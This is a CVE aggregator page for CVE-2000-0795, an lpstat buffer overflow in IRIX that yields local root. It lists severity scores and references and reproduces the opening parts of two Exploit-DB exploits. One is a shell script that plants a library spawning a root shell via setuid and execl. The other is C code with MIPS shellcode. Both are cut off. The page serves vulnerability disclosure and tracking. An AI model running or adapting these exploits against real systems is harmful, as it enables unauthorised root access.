CVE-2000-0795
Published 2000-10-20
CVE-2000-0795: Buffer overflow in lpstat in IRIX 6.2 and 6.3 allows local users to gain root privileges via a long -n option.
Priority: P425 | Severity: high | CVSS 2.0: 7.2
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.17% (63.6th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
| sgi | irix | — | — |
No detection rules found.
Exploit-DB
IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation
exploitdb·2001-05-07
---
```sh
#!/bin/sh
## copyright LAST STAGE OF DELIRIUM jul 2000 poland *://lsd-pl.net/ #
## /usr/bin/lpstat #
EXECUTABLE=/usr/bin/lpstat
FILE=file
LIBRARY=lsd
DIRECTORY=tmp
cd $DIRECTORY
cat > $FILE > $FILE
chmod 666 $FILE
cat > $LIBRARY.c << 'EOF'
OpenConn(){
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/\n");
printf("/usr/bin/lpstat for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n");
printf("\n");
setreuid(getuid(),0);setuid(0);setgid(0);
execl("/bin/sh","sh",0);
}
CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(){} WaitForJob(){}
GetQueue(){} StartTagging(){} StopTagging(){} Install(){} AddTimeout(){}
RemoveSemiColons(){} CreateInterface(){} InstallPrinter(){}
InstallI
```
Exploit-DB
IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
exploitdb·1998-11-01
---
```c
/*
source: https://www.securityfocus.com/bid/1529/info
Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise.
*/
/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/
/*## /bin/lpstat #*/
#define NOPNUM 468
#define ADRNUM 300
#define PCHNUM 300
char setreuidcode[]=
"\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */
"\x24\x02\x04\x01" /* li $v0,1024+1 */
"\x20\x42\xff\xff" /* addi $v0,$v0,-1 */
"\x03
```
No writeups or analysis indexed.
http://www.osvdb.org/1485
http://www.securityfocus.com/bid/1529
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558%40ix.put.poznan.pl
Published: 2000-10-20